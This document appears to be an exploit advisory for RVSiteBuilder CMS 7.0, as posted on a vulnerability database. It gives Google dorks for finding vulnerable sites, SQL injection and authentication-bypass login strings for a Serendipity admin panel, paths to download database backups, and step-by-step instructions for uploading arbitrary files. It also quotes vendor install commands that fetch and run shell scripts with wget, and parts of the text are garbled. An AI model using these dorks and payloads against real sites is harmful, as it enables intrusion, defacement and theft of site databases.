Lucene search
K

RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection

🗓️ 14 Feb 2019 00:00:00Reported by KingSkrupellosType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 376 Views

RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities including SQL Injection, Authentication Bypass, and Information Exposur

Code
`#################################################################################################  
  
# Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities  
  
Vulnerabilities are =>   
******************  
SQL Injection / File Upload / Authentication Bypass / Database Disclosure  
  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Team  
# Date : 14/02/2019  
# Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com  
+ dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com  
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/  
+ twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_  
# Version : 7.0 and all previous versions.  
# Google Dork : inurl:''/rvsindex.php/''  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : High  
# Vulnerability Types : CWE-209 [ Information Exposure Through an Error Message ]  
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]  
+ CWE-264 [ Permissions, Privileges, and Access Controls ]  
+ CWE-200 [ Information Exposure ]  
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]  
+ CWE-592 [ Authentication Bypass Issues ]  
+ CWE-23 [ Relative Path Traversal ]  
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]  
+ CWE-36 [ Absolute Path Traversal ]  
+ CWE-538 [ File and Directory Information Exposure ]  
+ CWE-548 [ Information Exposure Through Directory Listing ]  
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101  
  
#################################################################################################  
  
# RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities  
*********************************************************************************************  
  
# Vulnerabilities and Exploits includes =>  
************************************   
  
1) Full Path Disclosure Vulnerability  
2) SQL Injection Vulnerability  
3) Arbitrary File Upload Vulnerability   
4) Arbitrary File Download Database Backup .sql Vulnerability  
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload  
6) Blog Administration Control Panel Authentication Bypass Vulnerability  
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing  
8) Information Exposure Through an Error Message  
9) Permissions, Privileges, and Access Controls  
  
#################################################################################################  
  
# Description : RVglobalsoft is the leading software solutions for hosting provider.  
***********************************************************************  
  
# Google Dork 1 : inurl:''/rvsindex.php/''  
  
# Google Dork 2 : inurl:''/rvsindex.php?/user/login''  
  
# Google Dork 3 : inurl:''/rvsindex.php/user/register''  
  
# Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js  
  
#################################################################################################  
  
# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] =>   
*****************************************************************************************  
  
TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]  
  
FOR CPANEL =>   
  
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz  
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi  
  
FOR DURECTADMUN =>   
  
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz  
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi  
  
#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to   
open stream: No such file or directory in /home/DOMAINADDRESS  
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264  
  
Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with  
SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr  
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89  
  
Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with   
SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr  
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89  
  
Strict Standards: Non-static method SGL_FrontController::isGoToClearCached()   
should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear  
/RVSeagullMod/lib/SGL/FrontController.php on line 257  
  
Strict Standards: Declaration of SGL_MDB2::query() should be compatible with   
MDB2_Driver_Common::query($query, $types = NULL, $result_class =   
true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish  
/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82  
  
Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename()   
should not be called statically, assuming $this from incompatible context in   
/opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60  
  
Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS  
/public_html/rvscommonfunc.php on line 174  
Please contact your host provider ssh as root to server and run.  
  
Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20  
  
####################################################################################################  
  
PATH => TARGET/ComponentAndUserFramework.php   
  
Please edit /home2/DOMAINADDRESS/public_html/php.ini  
change include_path to  
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54  
/usr/share/pear:/usr/local/lib/php"  
  
# PATH for View Homepage => TARGET/rvsindex.php  
  
####################################################################################################  
  
# RevSiteBuilder Admin Login Control Panel Authentication Bypass =>   
**************************************************************  
  
TARGET/admin or this is the Admin Panel way =>  
  
/rvsindex.php?/user/login/  
  
# PATH Admin Panel Login WordPress =>   
  
TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1  
  
# PATH Admin Panel Login Joomla =>   
  
TARGET/administrator  
  
# PATH Admin Panel Login osCommerce =>   
  
TARGET/admin  
  
# PATH Admin Panel Login OpenCart =>   
  
TARGET/admin  
  
Note : Some RVSiteBuilder websites uses wordpress and joomla   
but all files belongs to revsitebuilder and rvglobalsoft software.   
It is totally weird vulnerability.   
  
They have path like TARGET/blogweb or TARGET/osc   
  
But some sites gives this error. Sometimes it asks for username and password.  
  
Please contact your provider edit file php.ini  
change include_path to  
include_path = ".:/usr/lib/php:/usr/local/lib/php"  
save file and restart apache  
  
####################################################################################################  
  
# PATH for Uploaded Documents =>   
  
TARGET/documents/  
  
####################################################################################################  
  
# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => T  
  
TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/  
  
# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources  
  
####################################################################################################  
  
# PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/   
  
####################################################################################################  
  
# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/  
  
####################################################################################################  
  
# PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo  
  
####################################################################################################  
  
# PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG  
  
####################################################################################################  
  
# PATH Learn Version => TARGET/js/scriptaculous/VERSION  
  
####################################################################################################  
  
# PATH for Optimizer => TARGET/optimizer.php  
  
Please edit /home2/DOMAIN/public_html/php.ini  
change include_path to  
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"  
  
####################################################################################################  
  
# Other Paths that gives same error =>   
  
#TARGET/rvsMasterCompoDB.php  
#TARGET/rvsStaticWeb.php  
#TARGET/rvscommonfunc.php  
#TARGET/rvssetup.php  
  
Please edit /home2/DOMAIN/public_html/php.ini  
change include_path to  
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"  
  
####################################################################################################  
  
#QuickForm tutorial example - *Enter your name:  
  
#/scripts/rvslib/Pear/quickFormTest.php  
#/themes/default/default/testForms.html  
  
####################################################################################################  
  
#{if:adminApprove} {adminApprove}  
#/themes/rvtheme/authweb/authPage.html  
  
####################################################################################################  
  
#{foreach:aFaqData,key,aValue} {if:aValue.category_name}   
#/themes/rvtheme/faqweb/viewFaqWeb.html  
  
###################################################################################################  
  
#{if:forumsInstall} - Search for forums  
#TARGET/themes/rvtheme/forums/blocksearch.html  
  
####################################################################################################  
  
# Testing forms  
# /themes/default/testForms.php  
  
#################################################################################################  
  
# RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability  
  
# TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login   
  
# Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS  
  
#################################################################################################  
  
# {translate(pageTitle)} Contactus  
# /themes/rvtheme/main/contactMail.html  
  
#################################################################################################  
  
#{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}  
#/themes/rvtheme/newsletter/authorize.html  
#/themes/rvtheme/newsletter/list.html  
#/themes/rvtheme/newsletter/uikit_list.html  
  
#################################################################################################  
  
#RVTheme Admin Area and Users useable Login Paths =>   
  
#/themes/rvtheme/user/account.html  
#/themes/rvtheme/user/accountSummary.html  
#/themes/rvtheme/user/blockLogin.html  
#/themes/rvtheme/user/blockLogout.html  
#/themes/rvtheme/user/horizontalBlockLogin.html  
#/themes/rvtheme/user/loginForgot.html  
#/themes/rvtheme/user/prefUserEdit.html  
#/themes/rvtheme/user/profile.html  
#/themes/rvtheme/user/uikit_login.html  
#/themes/rvtheme/user/uikit_loginForgot.html  
#/themes/rvtheme/user/uikit_prefUserEdit.html  
#/themes/rvtheme/user/uikit_userAddUseCompoDB.html  
#/themes/rvtheme/user/uikit_userPasswordEdit.html  
#/themes/rvtheme/user/userAdd.html  
#/themes/rvtheme/user/userAddUseCompoDB.html  
#/themes/rvtheme/user/userPasswordEdit.html  
#/themes/rvtheme/user/verticalBlockLogin.html  
#/themes/rvtheme_admin/articleweb/admin_articleEdit.html  
#/themes/rvtheme_admin/articleweb/admin_articleManager.html  
#/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html  
#/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html  
#/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html  
#/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html  
#/themes/rvtheme_admin/faqweb/admin_faqWebManager.html  
#/themes/rvtheme_admin/css/  
  
#####################################################################################################  
  
#Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt  
  
#####################################################################################################  
  
#Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js  
  
#####################################################################################################  
  
Getting started with Seagull Project => [ Seagull PHP Framework - (c) Seagull Systems 2003-2007 ]  
  
/rvsindex.php?/default/masterLayout/layout-navtop-3col.css/  
  
#####################################################################################################  
  
# RevSiteBuilder SQL Injection Vulnerability =>   
*****************************************  
  
#Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be   
compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local  
/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89  
  
#Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible   
with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php  
/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89  
  
#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to   
open stream: No such file or directory in /home/DOMAINADDRESS  
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264  
  
#################################################################################################  
  
# What You See Is What You Get [ WYSIWYG ] Exploiter =>   
*******************************************************  
  
# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit  
  
# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html  
  
# Example Site => /images/....  
  
# Allowed File Extensions => .txt .png .gif .jpg .xml  
  
# Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server  
  
Please contact your host provider ssh as root to server and run.   
  
For cpanel   
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz   
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi   
  
For directadmin   
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz   
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi   
  
Tutorial '' How to download RVsiteBuilder package file manually ? ''  
  
For cPanel  
--------------------  
  
SSH to your cPanel server as root and run command  
  
cd /usr/local/cpanel/whostmgr/docroot/cgi/  
  
rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/  
  
rm -f rvsitebuilderinstaller.tar  
  
wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar  
  
tar -xvf rvsitebuilderinstaller.tar  
  
rm -f rvsitebuilderinstaller.tar  
  
mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages  
  
cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages  
  
wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar  
  
tar -xvf scriptdownloadpackage.tar  
  
/usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php  
  
Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/  
  
--------------------  
  
For DirectAdmin  
  
--------------------  
  
SSH to your cPanel server as root and run command  
  
cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages  
  
wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar  
  
tar -xvf scriptdownloadpackage.tar  
  
php scriptdownloadpackage.php  
  
Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/  
  
Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/  
  
Reference => rvskin.com/rvlogin/rvloginssh  
  
##################################################################################################  
  
# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability  
  
# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql   
  
# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql  
  
# Example Site DB Backup View => archive.is/Demkr  
  
###################################################################################################  
  
1) Register yourself to the site  
  
TARGET/rvsindex.php?/user/register/  
  
It says => You have successfully been registered. Please check your email for confirmation of your password.  
  
Note : Confirm your registration in order to proceed.   
Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration.   
Pay attention : When you register choose your nickname carefully because it is important.   
  
It says => Activation is successfully. Please login.  
  
2) Login to the User Interface =>   
  
TARGET/rvsindex.php?/user/login/action/login  
  
3) You can use Account - User Preference - User Password Change Area  
  
/rvsindex.php?/user/account/action/viewProfile/  
/rvsindex.php?/user/account/  
/rvsindex.php?/user/userpreference/  
/rvsindex.php?/user/userpassword/action/edit/  
  
4) Go to your Profile like this =>   
  
TARGET/rvsindex.php?/user/account/action/viewProfile/  
  
Edit these Values  
  
Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)  
  
It says => Your profile details have been successfully updated  
  
PATH : /themes/rvtheme/images/YOURNUCKNAME.  
  
Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html   
  
Just . [ dot ] is important here. You will see your index on that site.  
  
#################################################################################################  
  
# Serendipity RevSiteBuilder Blog Administration  
  
# /blogweb/serendipity_admin.php  
  
# Username : '=''or'  
# Password : '=''or'  
  
# You can use for both of them as '' admin '' '' admin ''  
  
# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect  
  
# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true  
  
# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect  
  
# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal  
  
# /blogweb/uploads/yourfilename.rar  
  
# Solution for Serendipity Blog Administration  
  
# To mitigate this issue please upgrade at least to version 2.0.2:  
  
# Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip  
  
# Please note that a newer version might already be available.  
  
#################################################################################################  
  
How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess  
  
cPanel  
ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command:  
cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh  
Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process.  
Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.  
  
DirectAdmin  
ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command:  
cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh  
For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)  
2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:  
perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl  
2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:  
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod  
Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15  
Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process.  
Login to DirectAdmin as "admin" and Configure plugin on your panel.  
RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but   
you can set plans in user level by RVsitebuilder Admin   
Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'  
  
#################################################################################################  
  
RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/  
  
RVSiteBuilder Installation => rvsitebuilder.com/installation/   
  
RVSiteBuilder and RVGlobalSoft Tutorials =>   
  
rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm Digital Security Team  
  
#################################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation